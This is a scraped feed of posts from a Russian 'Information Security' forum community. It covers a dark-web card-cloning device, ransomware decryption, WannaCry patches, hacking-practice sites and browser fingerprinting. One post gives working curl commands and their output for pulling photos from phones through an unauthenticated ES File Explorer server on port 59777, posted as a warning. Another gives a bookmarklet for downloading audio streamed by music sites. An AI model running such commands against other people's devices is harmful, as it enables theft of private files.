Сообщество - Информационная безопасность
Информационная безопасность
843 поста 18 224 подписчика
1969

В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду

Многие наверняка помнят историю, широко обсуждавшуюся в рунете прошлой зимой. Тогда сотрудник «Лаборатории Касперского» Олег Горобец заметил в метро человека с подозрительным устройством. По мнению специалиста, тот мог сканировать одежду и сумки пассажиров, в надежде поживиться данными о банковских картах с RFID чипами. Хотя тогда большинство участников дискуссии сочли, что Горобец принял за злоумышленника обычного курьера с терминалом оплаты, такой вид мошенничества действительно существует. Так, издание Softpedia сообщает, что группа хакеров The CC Buddies продает в даркнете новый девайс, который способен клонировать 15 банковских карт в секунду с расстояния в восемь сантиметров.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду Длиннопост, Устройство, Хакеры, Даркнет, Продажа, Клоны, Бесконтакная карта, Банковская карта

Популярность такого рода мошенничества растет прямо пропорционально количеству карт с RFID чипами у населения. Похоже, скоро человек, тесно прижимающийся к другим пассажирам в общественном транспорте, будет вызвать мысли вовсе не об извращенцах, а о кардерах.


The CC Buddies назвали свое устройство Contactless Infusion X5 и уверяют, что с ним атакующему даже не придется ни к кому прижиматься – достаточно просто пройти сквозь толпу, к примеру, в подземке или на концерте. Находясь на достаточно близком расстоянии, девайс копирует данные с современных бесконтактных карт и записывает их во внутреннее хранилище. Впоследствии злоумышленник подключит прибор к компьютеру через USB-порт, а специальное приложение, которое The CC Buddies продают в комплекте с устройством, позволит извлечь украденную информацию. Немаловажен и тот факт, что прибор весит всего 70 граммов, а его размеры более чем скромны: 98 x 65 x 12,8 мм.

«Contactless Infusion X5 – первое устройство для хакинга бесконтактных банковских карт на черном рынке. Продукт был создан и разработан The CC Buddies. Contactless Infusion X5 способен распознать и считать карту ЛЮБОГО банка на расстоянии всего 8 сантиметров! Чтение происходит на потрясающей скорости — 1024 кбит/с, то есть этот мощный бесконтактный ридер считывает примерно 15 банковских карт в секунду!»

— пишут создатели устройства в своем объявлении.


Contactless Infusion X5 собирает данные о номере карты и сроке ее действия. Если RFID чип карты также содержит и другие данные, будь то имя владельца, его адрес или выписка о последних операциях по счету, прибор похитит и эту информацию. Создатели устройства утверждают, что оно читает данные о любых карт на частоте 13,56 МГц.


Информацию о картах Contactless Infusion X5 хранит в зашифрованном виде. Программа, которую предоставляют злоумышленники, позволит расшифровать данные и скачать их на компьютер, работающий под управлением Windows XP или выше. Затем можно приступать к печати фальшивых копий. Пока ПО хакерской группы работает только с банковскими картами, но в будущем авторы обещают расширить его функциональность.

В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду Длиннопост, Устройство, Хакеры, Даркнет, Продажа, Клоны, Бесконтакная карта, Банковская карта
Свое устройство The CC Buddies оценили в 1,2 биткоина (порядка $825 по текущему курсу). Девайсы покупателям будут отправлены обычной почтой. В комплекте с каждым устройством поставляется кабель USB 3.0 для зарядки и передачи данных, специальный софт, а также 20 чистых «болванок» для изготовления банковских карт. Сообщается, что три часа подзарядки гарантируют десять часов работы устройства. Ниже можно ознакомиться с полными техническими характеристиками Contactless Infusion X5.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду Длиннопост, Устройство, Хакеры, Даркнет, Продажа, Клоны, Бесконтакная карта, Банковская карта
Показать полностью 2
2104

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)

Jaff шифрует файлы и добавляет расширения  .jaff, .wlu и .sVn, требует выкуп 1,79 биткоина, то есть порядка $4000.


Через диспетчер задач вырубаем процесс вируса. Как правило произвольное имя процесса. Для примера было SKM_C224e9930.exe

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост

Качаем декриптор с сайта каспера http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhn...


Утилита предложит выбрать зашифрованный файл с расширением .jaff, .wlu или .sVn, далее попросит выбрать текстовый файл с требованием выкупа.

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост
Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост

Утилита просканирует весь компьютер и расшифрует файлы (может занять длительное время).

По завершении сканирования будет такая картина:

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff) Декриптор, Вирус, Шифровальщик, Расшифровка, Утилиты, Длиннопост

Печаль в том что вместе с расшифрованными файлами останутся их зашифрованные копии.

Дополнительная инфа https://www.bleepingcomputer.com/news/security/decrypted-kas...


Ранее о дешифровщиках: http://pikabu.ru/story/spisok_dekriptorov_faylov_posle_zaraz...

Показать полностью 3
3116

Ссылки на обновления Microsoft (MS17-010) от уязвимостей, эксплуатируемых Wana Decrypt0r

Каталог обновлений Microsoft под наплывом желающих сейчас очень плохо выдаёт ссылки, поэтому решил потратить время и поделиться ссылками сюда


Windows XP: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Vista x86: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Vista x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2008 x86: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2008 x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows 7 x86: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows 7 x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2008 R2: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows 8 x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 8 x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows Server 2012: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 8.1 x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 8.1 x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows Server 2012 R2: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1511) x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1511) x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1607) x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1607) x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2016: http://download.windowsupdate.com/d/msdownload/update/softwa...


upd:

Windows XP x64: http://download.windowsupdate.com/d/csa/csa/secu/2017/02/win...

Windows Server 2003 x86: http://download.windowsupdate.com/c/csa/csa/secu/2017/02/win...

Windows Server 2003 x64: http://download.windowsupdate.com/c/csa/csa/secu/2017/02/win...


Вирус распространяется через 445 порт (его использует samba, служба доступа к файлам), эксплуатирует уязвимость в SMBv1 протоколе (эту устаревшую версию можно отключить отдельно: https://support.microsoft.com/en-us/help/2696547/how-to-enab...).


Подвержены опасности компьютеры, напрямую подключенные к интернету (без NAT/firewall), также есть случаи заражения через UPnP конечных компьютеров (пользователь заходит на зараженный сайт/скачивает вирус, тот пробрасывает 445 порт на этот компьютер, заражает компьютер, затем распространяется тем же методом по локальной сети). Буду рад различным тех. подробностям в комментариях, в том числе актуальной информации о реакции антивирусов.


Делайте бэкапы, недоступные через сеть или интернет простыми способами!

Придумав способ резервного копирования, спросите себя: как может мой бэкап пострадать, какие у моего способа уязвимости? Если есть хитрожопый злоумышленник, как он смог бы лишить меня моих данных?

Показать полностью
1168

Пока WannaCry запугивает пользователей с не обновленной системой, Adylkuzz незаметно пользуется уязвимостью.

За громкой атакой вируса WannaCry, который использовал уязвимости Windows, чтобы внедряться в компьютеры, шифровать файлы и требовать от пользователей выкуп в биткоинах, почти незамеченной прошла другая напасть. Малозаметная программа внедрена через уязвимость того же типа в сотни тысяч машин по всему миру и потихоньку делает деньги для своих создателей. За счёт ваших мощностей и трафика.

Пока WannaCry запугивает пользователей с не обновленной системой, Adylkuzz незаметно пользуется уязвимостью. Вирус, Wannacry, Adylkuzz, Криптовалюта

О программе Adylkuzz, которая без лишнего шума внедряется в компьютеры по всему миру, используя уязвимости Windows, пишет Mashable, ссылаясь на специалистов компании Proofpoint. Если вирус WanaCrypt0r, известный также под именем WannaCry, наделал много шума, блокировав работу десятков и, возможно, даже сотен тысяч компьютеров в 150 странах, в том числе банкоматов, серверов в больницах, полиции, компаниях связи и транспорта, то Adykluzz действует по-другому. Он никак не даёт знать о себе, если не следить за нагрузкой процессора или видеокарты, потому что не требует выкуп и не наносит вреда файлам, а просто понемногу «майнит» криптовалюту Monero, а затем отправляет её на адреса, связанные с возможными авторами вируса. Специалисты из Proofpoint обнаружили несколько таких адресов, которые агрегируют Monero на разные суммы от 7 до 22 тысяч долларов. Один Monero стоит сейчас около 25 долларов.


По оценкам Proofpoint, заражены уже сотни тысяч компьютеров с устаревшими версиями Windows, на которых отключены обновления, и с пиратскими копиями, причём пользователи по большей части ничего не знают о своих проблемах. Атака Adylkuzz началась за несколько недель до атаки WannaCry. Создатели Adykluzz использовали те же самые хакерские разработки из Агентства национальной безопасности США, утёкшие в сеть, что и авторы WannaCry. Но в отличие от последних, почти ничего не заработавших на своей атаке, могут получить существенную прибыль.

2101

22 сайта для практики хакинга и защиты

22 сайта для практики хакинга и защиты Взлом, Безопасность, Сайт, Тренинг, Хакерство, Практика, Длиннопост

Навыки в информационной безопасности сейчас пользуются большим спросом. Так как люди стремятся из всего сделать приложение и подключить к интернету даже самые примитивные устройства, спрос будет только расти. Поэтому неудивительно, что сегодня все хотят научиться хакингу.

Однако на множестве форумов можно встретить новичков, которые не знают, с чего начать изучение хакинга или где его попрактиковать. Специально для них мы представляем подборку сайтов, на которых можно приобрести и улучшить навыки хакинга.


Приведённые ниже площадки доступны только на английском языке.

1.CTF365- ctf365.com

Пользователи CTF365 устанавливают и защищают свои собственные серверы одновременно с атаками на серверы других пользователей. CTF365 подойдёт профессионалам в области безопасности, которые хотят приобрести наступательные навыки, или системным администраторам, заинтересованным в улучшении своих защитных навыков. Если вы новичок в инфосеке, вы можете зарегистрировать бесплатную учетную запись для начинающих и познакомиться с ним с помощью нескольких предварительно настроенных уязвимых серверов.

2.OVERTHEWIRE- overthewire.org/wargames

OverTheWire подойдёт всем желающим изучить теорию информационной безопасности и применить её на практике независимо от своего опыта. Новичкам следует начать с задач уровня Bandit, поскольку они необходимы для дальнейшего решения других задач.

3.HACKING-LAB- www.hacking-lab.com/index.html

Hacking-Lab предоставляют задачи CTF для European Cyber Security Challenge, но они также проводят на своей платформе регулярные соревнования, в которых может участвовать каждый. Просто зарегистрируйтесь, настройте vpn и выберите себе задачу по вкусу.

4.PWNABLE.KR- pwnable.kr

Данная площадка фокусируется на pwn-задачах, подобных CTF, суть которых заключается в поиске, чтении и отправке файлов-флагов, которые есть в каждой задаче. Для доступа к содержимому файлов вы должны использовать навыки программирования, реверс-инжиниринга или эксплуатации уязвимостей, прежде чем сможете отправить решение.

Задачи делятся на 4 уровня сложности: лёгкий — для новичков, средний, сложный и хардкор, где задачи требуют нестандартных подходов для решения.

5.IO- io.netgarage.org

IO — это варгейм от создателей netgarage.org, сообщества, в котором единомышленники делятся знаниями о безопасности, искусственном интеллекте, VR и многом другом. Было создано 3 версии варгейма: IO, IO64 и IOarm, из них всех IO является наиболее зрелой. Подключайтесь к IO через SSH и можете приниматься за работу.

6.SMASHTHESTACK- smashthestack.org

SmashTheStack состоит из 7 различных варгеймов: Amateria, Apfel (в настоящее время офлайн), Blackbox, Blowfish, CTF (в настоящее время офлайн), Logic и Tux. Каждый варгейм содержит множество задач, начиная от стандартных уязвимостей и заканчивая задачами на реверс-инжиниринг.

7.MICROCORRUPTION- microcorruption.com/login

Microcorruption представляет собой CTF, в котором вам нужно «зареверсить» вымышленные электронные блокирующие устройства Lockitall. Устройства Lockitall защищают облигации, размещённые на складах, принадлежащих вымышленной компании Cy Yombinator. На пути к краже облигаций вы познакомитесь с ассемблером, узнаете, как использовать отладчик, пошагово выполнять код, устанавливать точки останова и исследовать память.

8.REVERSING.KR- reversing.kr/index.php

Здесь вы можете найти 26 задач для проверки ваших навыков взлома и реверс-инжиниринга. Сайт не обновлялся с конца 2012 года, но имеющиеся задачи по-прежнему являются ценными учебными ресурсами.

9.HACK THIS SITE- www.hackthissite.org

Hack This Site — бесплатный сайт c варгеймами для проверки и улучшения ваших навыков хакинга. Нам нём можно найти множество хакерских задач в нескольких категориях, включая базовые задачи, реалистичные задачи, приложения, программирование, фрикинг, JavaScript, форензику, стеганографию и т.д. Также сайт может похвастаться активным сообществом с большим каталогом хакерских статей и форумом для обсуждения вопросов, связанных с безопасностью. Недавно было объявлено, что кодовая база сайта будет пересмотрена, поэтому в ближайшие месяцы можно ожидать большие улучшения.

10.W3CHALLS- w3challs.com

W3Challs — это обучающая платформа с множеством задач в различных категориях, включая хакинг, варгеймы, форензику, криптографию, стеганографию и программирование. Цель платформы — предоставить реалистичные задачи. В зависимости от сложности решённой задачи вы получаете баллы. Также есть форум, на котором можно обсуждать и решать задачи с другими участниками.

11.PWN0- pwn0.com

Площадка pwn0 — это VPN, в которой происходит почти всё, что угодно. Сражайтесь против ботов или пользователей и набирайте очки, получая контроль над другими системами.

12.EXPLOIT EXERCISES- exploit-exercises.com

Exploit Exercises предлагает множество виртуальных машин, документацию и задачи, которые пригодятся в изучении повышения привилегий, анализа уязвимостей, разработки эксплойтов, отладки, реверс-инжиниринга и т.д.

13.RINGZER0 TEAM ONLINE CTF- ringzer0team.com

RingZer0 Team Online CTF предлагает более 200 задач, которые позволят вам проверить навыки взлома по нескольким направлениям — от криптографии, анализа вредоносных программ до SQL-инъекции, шеллкодинга и многого другого. После того, как вы нашли решение задачи, вы можете отправить его RingZer0 Team. Если ваше решение будет принято, вы получите RingZer0Gold, которое можно обменять на подсказки во время решения задач.

14.HELLBOUND HACKERS- www.hellboundhackers.org

На Hellbound Hackers можно найти традиционные задачи с эксплойтами и такие форматы задач, которых нет на других ресурсах. Например, патчинг приложений и задачи, ограниченные по времени. В задачах с патчингом вам даётся уязвимый фрагмент кода и вам нужно предложить исправление этой уязвимости.

15.TRY2HACK- www.try2hack.nl

Try2Hack — один из старейших сайтов по улучшению навыков хакинга, который всё ещё остаётся на плаву. Он предлагает несколько задач, чтобы развлечься. Задачи разнообразны и по мере продвижения становятся всё сложнее.

16.HACK.ME- hack.me

Hack.me представляет собой большую коллекцию уязвимых веб-приложений для применения навыков взлома на практике. Все приложения предоставляются сообществом и каждое из них можно запустить «на лету» в безопасной, изолированной песочнице.

17.HACKTHIS!!- www.hackthis.co.uk

HackThis!! состоит из 50+ задач разного уровня, за решение каждой из которых вы получаете определённое количество очков в зависимости от уровня сложности. Подобно Hack This Site, у HackThis!! также есть живое сообщество, многочисленные статьи и новости о хакинге, а также форум, на котором вы можете обсудить задачи и вопросы, связанные с безопасностью.

18.ENIGMA GROUP- www.enigmagroup.org

Enigma Group содержит более 300 задач с акцентом на топ-10 эксплойтов OWASP. Сайт имеет почти 48000 активных участников и проводит еженедельные CTF-соревнования, а также еженедельные и ежемесячные конкурсы.

19.GOOGLE GRUYERE- google-gruyere.appspot.com

Google Gruyere показывает, как можно эксплуатировать уязвимости веб-приложений и как от этого защититься. Вы сможете провести реальное тестирование на проникновение и фактически взломать настоящее приложение, используя атаки вроде XSS и XSRF.

20.GAME OF HACKS- www.gameofhacks.com

Game of Hacks показывает вам набор фрагментов кода в виде викторины с несколькими вариантами выбора, а вы должны определить правильную уязвимость в коде. Этот сайт немного выделяется из этого списка, но тем не менее это хорошая игра для выявления уязвимостей в коде.

21.ROOT ME- www.root-me.org

Root Me предлагает более 200 задач и более 50 виртуальных сред, позволяющих вам применить на практике свои навыки взлома в различных сценариях. Это определённо один из лучших сайтов в данном списке.

22.CTFTIME- ctftime.org

Хотя CTFtime не является хакерским сайтом, как другие в этом списке, это отличный ресурс, чтобы оставаться в курсе CTF-соревнований, происходящих по всему миру. Поэтому, если вы заинтересованы в присоединении к CTF-команде или участии в соревновании, вам стоит сюда заглянуть.

Перевод https://tproger.ru/translations/23-hacking-sites-for-practic...

Первоисточник https://hackerlists.com/hacking-sites/

Показать полностью
2040

Практики по курсу "Компьютерные сети" + Бонус.

Анализатор сети Wireshark
Канальный уровень в Wireshark
Wi-Fi джунгли
Протокол IP
Инкапсуляция
Протокол DHCP в Wireshark
Протокол ARP
Протокол ICMP в Wireshark
Порты на транспортном уровне
FTP в Wireshark
Протокол DNS в Wireshark

P.S. бонус в комментариях.

Показать полностью 8
1353

Бэкдор в ES File Explorer File Manager, позволяющий скачать любой файл из твоего телефона

Цель данного поста - предупредить пользователей и предостеречь от использования дырявого говнопродукта, автор не призывает использовать приведённую ниже информацию для получения доступа к чужим данным, т.к. можно получить путёвку на 2 года с бесплатным шампанским.


Недавно нашли бэкдор в ES File Manager, приложение просто создало http сервер не защищённый паролем на порту 59777, который позволяет получить список всех файлов, приложений, скачать файлы, запустить любое из установленных приложений и многое другое, ES File Manager об этом, естественно, никак не предупреждает пользователя. Таким образом, чувак из той же сети(например в маке) может получить доступ ко всем вашим файлам.


Вроде первый написал этот чувак https://twitter.com/fs0c131y/status/1085460755313508352

Вот тут сделали скрипт для работы с сервером https://github.com/fs0c131y/ESFileExplorerOpenPortVuln


Я скрипт не запускал, а воспользовался curl'ом


Пишем:

> curl --header "Content-Type: application/json" -X POST http://192.168.1.3:59777/ --data '{"command":"listPics"}'

Где 192.168.1.3 - IP моего телефона в сети. Получаем список всех фоток на телефоне:

[

{"name":"IMG_20180802_192056_HHT.jpg", "time":"8/2/18 08:20:56 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180802_192056_HHT.jpg", "size":"1.64 MB (1,720,783 Bytes)", },

{"name":"IMG_20180728_160906.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_160906.jpg", "size":"4.69 MB (4,914,234 Bytes)", },

{"name":"IMG_20180801_120928.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180801_120928.jpg", "size":"5.68 MB (5,951,479 Bytes)", },

{"name":"IMG_20180728_132235.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_132235.jpg", "size":"4.94 MB (5,176,983 Bytes)", },

{"name":"IMG_20180728_155557.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_155557.jpg", "size":"4.08 MB (4,275,890 Bytes)", },

{"name":"IMG_20180730_103456.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180730_103456.jpg", "size":"3.60 MB (3,776,144 Bytes)", },

Скачивать вот так:

> curl --header "Content-Type: application/json" http://192.168.1.3:59777/storage/2C7B-180C/DCIM/Camera/IMG_2... > /tmp/pic.jpg

Только что поставил последнюю версию с play маркета, запустил - бекдор есть.

1256

Эффективность

Коллега по работе вечно бомбит на тему, что у него «нет времени на все это дерьмо», в моменты когда просишь его помощи. Дескать у него работы невпроворот.

К слову у него одной из самых затратных по времени задач является привязать фото с беспилотника к точным координатам GNSS. Работа не сложная, но довольно долгая и муторная. Софт обрабатывает все быстро, а вот кликать мышкой выбирая нужные файлики и прокручивать длинный список на предмет ошибок - выходит довольно затратно по времени. А если этих привязок 3-5 - то на весь день.


В курилке предложил ему свою помощь с написанием скрипта автоматизации этого процесса, ведь логика там простая и все ошибки давно уже известны.

Я был послан нахуй, типа «там думать надо», «это невозможно» и тд.


Скрипт я написал.

Логика простая, запускам нужный софт, запускаем в нем скрипт автоматизации. Показываем где фото и где исходные Файлы с GNSS Ровера и Базы.

Дальше включается обработка и проверка ошибок по заданным критериям. Если все ок - выплевываем готовый файл привязки.

Если не ок - зовём кожаного мешка для проверки.


Погонял скрипт на старых данных за пол года работы. Процент вызова кожаного мешка примерно 3%.


Отдал скрипт коллеге и показал как пользоваться. Стоит ли говорить, что к этому он отнёсся скептично?

Прошло 2 месяца. Смотрю, пользуется)


Отсюда вывод: огромный процент работы многих сотрудников можно заменить простым скриптом написанном на коленке за 30 минут. (Это меньше по времени, чем один цикл ручной привязки)

1072

В Firefox 58 появится защита от скрытой идентификации пользователей при помощи Canvas

В Firefox 58 появится защита от скрытой идентификации пользователей при помощи Canvas Firefox, Отслеживание, Идентификация, Холст

В Firefox 58 планируют реализовать средства для противодействия скрытому отслеживанию пользователей при помощи API Canvas. Метод защиты уже ранее был реализован в браузере Tor Browser и сводится к выводу диалога с запросом подтверждения операции, при использовании на сайте кода для обработки изображений, получающего содержимое областей при помощи метода getImageData.


Техника идентификации пользователя при помощи Canvas заключается в скрытой отрисовке картинки на странице, которая затем анализируется на предмет особенностей вывода, специфичных для используемого графического стека, GPU и видеодрайвера. Метод уже достаточно активно применяется рекламными сетями для пассивной идентификации браузеров в случае невозможности сохранения идентификатора в cookie. В невидимом iframe отрисовывается изображение и текст, после чего сформированная картинка читается при помощи getImageData и генрируется хэш загруженных данных, который выступает идентификатором. Ранее в сочетании с Canvas для идентификации также применялись техники перебора установленных шрифтов и оценки параметров аккумулятора через Batery Status API, но данные возможности отслеживания были заблокированы в Firefox 52.

Источник

1951

Работа и развлекательные сайты

Сегодня в одной фирме был очень расстроен один сотрудник - работодатель, как неожиданно оказалось, знал все о тех сайтах, которые он посещал в рабочее время. И для начала выписал ему нормальный такой штраф.

Работа и развлекательные сайты Информационная безопасность, Инкогнито, Работа

Как же так? - удивился сотрудник, ведь я использовал режим инкогнито!

Работа и развлекательные сайты Информационная безопасность, Инкогнито, Работа

Для тех, кто не в курсе, но любит посидеть на работе на разных левых сайтах - режим инкогнито, Tor, VPN и прочее не спасут вас от программ, которые периодически делают скриншоты и логируют действия пользователя, а потом отсылают отчеты начальству. Таких программ достаточно много, настройка их не требует очень большой квалификации, и даже если вы никогда не видели в глаза системного администратора вашей фирмы, не факт, что такая программа уже не настроена на вашем рабочем компе.


Как же быть - даже если вашей компетентности хватило на то, чтоб найти эту программу у себя на компе, удалив и заблокировав ее, работодатель все равно узнает об этом, т.к. перестанут приходить регулярные отчеты.


Насколько законны такие действия работодателя - вопрос к юристам, но, по моему личному опыту, именно юридические конторы и обращаются в первую очередь с просьбами настроить эту систему контроля сотрудников :).


Лучше используйте свои личные телефоны-планшеты для размещения резюме или посещений сомнительных с точки зрения работодателя сайтов. И лучше это делать не через сеть Wi-Fi работодателя.

Показать полностью
6185

Качаем песни с любых* сайтов без сомнительных приложений**

* почти любых.

** фактически с приложением, которые мы с вами напишем.


Начнем с принципа. Сейчас в моде HTML5, через который большинство музыкальных сайтов проигрывает музыку. А именно через тег AUDIO. Веб-программисты знают как он работает, расскажу для остальных пользователей. С помощью этого тега на веб-странице отображается готовый проигрыватель, со всеми нужными кнопками. Помимо прочих кнопок на нем есть и кнопка скачать. Но создатели сайтов предпочитают скрывать этот встроенный проигрыватель и "рисовать" проигрыватель своими руками, но играет музыку всё тот же тег AUDIO. В общих чертах так.

На практике этот тег можно отобразить, а также "вытащить" и ссылку на mp3. Технически подкованные пикабушники смогут понять принцип доставания этого тщательно скрываемого тега (перекрываем Audio.prototype.play).


Теперь немного практики (буду показывать на примере хрома):

1. Открываем панель закладок (в хроме Ctrl+Shift+B)

2. Нажимаем правой кнопкой по свободному месту и выбираем "Добавить страницу"

3. Вводим название, например "Показывать AUDIO"

4. В качестве URL вводим скрипт, который я укажу в конце.

Качаем песни с любых* сайтов без сомнительных приложений** Music, Скачивание, Free, Музыка, Скачать бесплатно, Взлом, Хакеры, Длиннопост, Гифка

5. "Сохранить"


Теперь разберемся как пользоваться:


1. Заходим на страницу, где будет воспроиводиться музыка.

2. Нажимаем на нашу закладку "Показать AUDIO".

3. Дальше включаем нужную нам песню на страницу и что мы видим в углу страницы:

Качаем песни с любых* сайтов без сомнительных приложений** Music, Скачивание, Free, Музыка, Скачать бесплатно, Взлом, Хакеры, Длиннопост, Гифка

4. Нажимаем правой кнопкой по ссылке сверху и выбираем "Сохранить ссылку как..." (если просто нажать скачать, то браузер отрежет название песни).


Enjoy)


Теперь это об исключениях. Не работает в музыке гугла. Там у них сильно заморочено всё.


Ну и сам скрипт:

javascript:!function() {
if (window._A_A_A_A_) {
alert('Already installed');
return;
}
window._A_A_A_A_ = true;
var _Audio_prototype_play=Audio.prototype.play;
var _PrevAudio = null;
var div = document.createElement('div');
div.style = "position:fixed;left:0;top:0;right:auto;bottom:auto;z-index:2000000000;border:5px solid black;background:white;color:black";
var a = document.createElement('a');
a.appendChild(document.createTextNode('?'));
a.style = "display:block;color:inherit;padding:.1em;max-height:1.2em;line-height:1.2em;text-overflow:ellipsis;overflow:hidden;white-space:nowrap;";
div.appendChild(a);
var audioPlacement = document.createElement('div');
div.appendChild(audioPlacement);
var input = document.createElement('input');
input.onfocus = function () {
input.select();
};
div.appendChild(input);
Audio.prototype.play = function () {
document.body.appendChild(div);
if (_PrevAudio && _PrevAudio.parentNode) {
_PrevAudio.parentNode.removeChild(_PrevAudio);
}
_PrevAudio = this;
audioPlacement.appendChild(_PrevAudio);
_PrevAudio.setAttribute('style',"display:block!important");
_PrevAudio.setAttribute('controls', 'controls');
a.style.width = _PrevAudio.clientWidth + 'px';
input.style.width = _PrevAudio.clientWidth + 'px';
a.download = '';
var src = _PrevAudio.src;
if (!src) {
src = _PrevAudio.querySelector('source[type="audio/mp3"]') || _PrevAudio.querySelector('source["type=audio/mpeg"]') || _PrevAudio.querySelector('source["type=audio/mp4"]') || _PrevAudio.querySelector('source]');
if (src) {
src = src.src;
}
}
a.firstChild.data = src;
a.href = src;
input.value = '';
setTimeout(getTitle, 100);
return _Audio_prototype_play.apply(this, arguments);
};
var getText = function (el, txt) {
txt = txt || [];
for (var i=0; i<el.childNodes.length; i++) {
switch (el.childNodes[i].nodeType) {
case Node.ELEMENT_NODE:
getText(el.childNodes[i], txt);
break;
case Node.TEXT_NODE:
txt.push(el.childNodes[i].data);
break;
}
}
return txt.join('');
};
var getTitleFromElements = function (artistSelector, titleSelector) {
var p = document.querySelector(artistSelector);
if (p) {
p = getText(p).replace(/^\s*[-–]\s*|\s*[-–]\s*$/g, '').trim();
}
var t = document.querySelector(titleSelector);
if (t) {
t = getText(t).replace(/^\s*[-–]\s*|\s*[-–]\s*$/g, '').trim();
}
return (p?p:'Unknown Artist') + ' - ' + (t?t:'Unknown Song');
};
var getTitle = function () {
var title = 'Unknown Artist - Unknown Song';
if (/(\.|^)yandex\.ru$/.test(document.location.host)) {
title = getTitleFromElements('.player-controls__track-container .track__artists', '.player-controls__track-container .track__title');
} else if (/(\.|^)vk\.com$/.test(document.location.host)) {
title = getTitleFromElements('.audio_page_player_title_performer', '.audio_page_player_title_song');
} else if (/(\.|^)ok\.ru$/.test(document.location.host)) {
title = getTitleFromElements('.mus_player_artist', '.mus_player_song');
} else if (/(\.|^)zvooq\.com$/.test(document.location.host)) {
title = getTitleFromElements('.topPanelTimeline-intitleArtist', '.topPanelTimeline-intitleRelease');
} else if (/(\.|^)karaoke\.ru$/.test(document.location.host)) {
title = getTitleFromElements('.player-karaoke-ru-copyrights-artists, .select-song .player-song-authors', '.player-karaoke-ru-copyrights-title, .select-song .player-song-title');
title += ' (караоке)';
} else if (/(\.|^)itunes\.apple\.com$/.test(document.location.host)) {
title = getTitleFromElements('.is-now-playing .bordered-list__subtitle, .product-hero-gutter .t-hero-headline', '.is-now-playing .bordered-list__title, .product-hero-gutter .is-active .table__row__name');
}
input.value = title;
_PrevAudio.download = a.download = title + '.mp3';
}
}();
Качаем песни с любых* сайтов без сомнительных приложений** Music, Скачивание, Free, Музыка, Скачать бесплатно, Взлом, Хакеры, Длиннопост, Гифка

Кто хочет поразбираться, пожалуйста, скопируйте этот текст в ваш любимый редактор и отформатируйте код. Если будете что-то менять, не используйте такие // комментарии. Буду рад вашей рецензии, особенности о информационной безопасности скрипта. Никто никуда ничего не ворует, ничего лишнего не майнит делает.


Создатели музыкальных платформ, ваш ход.


P.S. Я честно покупаю подписку на одном из сервисов, но для машины иногда качаю песенки.

Показать полностью 2
1444

В России ввели запрет на анонимное пользование мессенджерами

Правительство России утвердило новые правила проверки пользователей мессенджеров. Ими теперь сможет пользоваться только тот человек, на которого оформлен номер телефона, говорится в постановлении кабмина, опубликованном на официальном интернет-портале правовой информации.

Как уточняется в документе, правила вступят в силу через 180 дней. Согласно нововведению, мессенджеры будут доступны только тем, на кого оформлен номер телефона.


Теперь ближе:

В России ввели запрет на анонимное пользование мессенджерами Мессенджер, Анонимность, Сотовая связь, Данные абонента, Роскомнадзор, Постановление, Длиннопост, Блокировка

- Мессенджер запрашивает наличие в БД ОпСоСа информации об абоненте;

- Если информации об абоненте нет - блокировка возможности переписки;

- Если ОпСоС не дал ответ за 20 минут - блокировка возможности переписки;

- ОпСоС вносит в базу информацию что абонент использует определенный мессенджер -  уникальный код идентификации пользователя, который ему присвоит мессенджер ;

- Потерял сим-карту, не восстановил до полной блокировки сим-карты (расторжение договора) - блокировка возможности переписки.

В России ввели запрет на анонимное пользование мессенджерами Мессенджер, Анонимность, Сотовая связь, Данные абонента, Роскомнадзор, Постановление, Длиннопост, Блокировка

Александр Жаров (глава РКН):

«Возможность анонимной коммуникации в мессенджерах затрудняет деятельность правоохранительных органов при расследовании преступлений»

Материал:

Постановление: http://publication.pravo.gov.ru/Document/View/00012018110600...

Пост: https://iz.ru/808789/2018-11-06/v-rossii-vveli-zapret-na-ano...

https://iz.ru/808022/inna-grigoreva/polzovatelskoe-oglasheni...

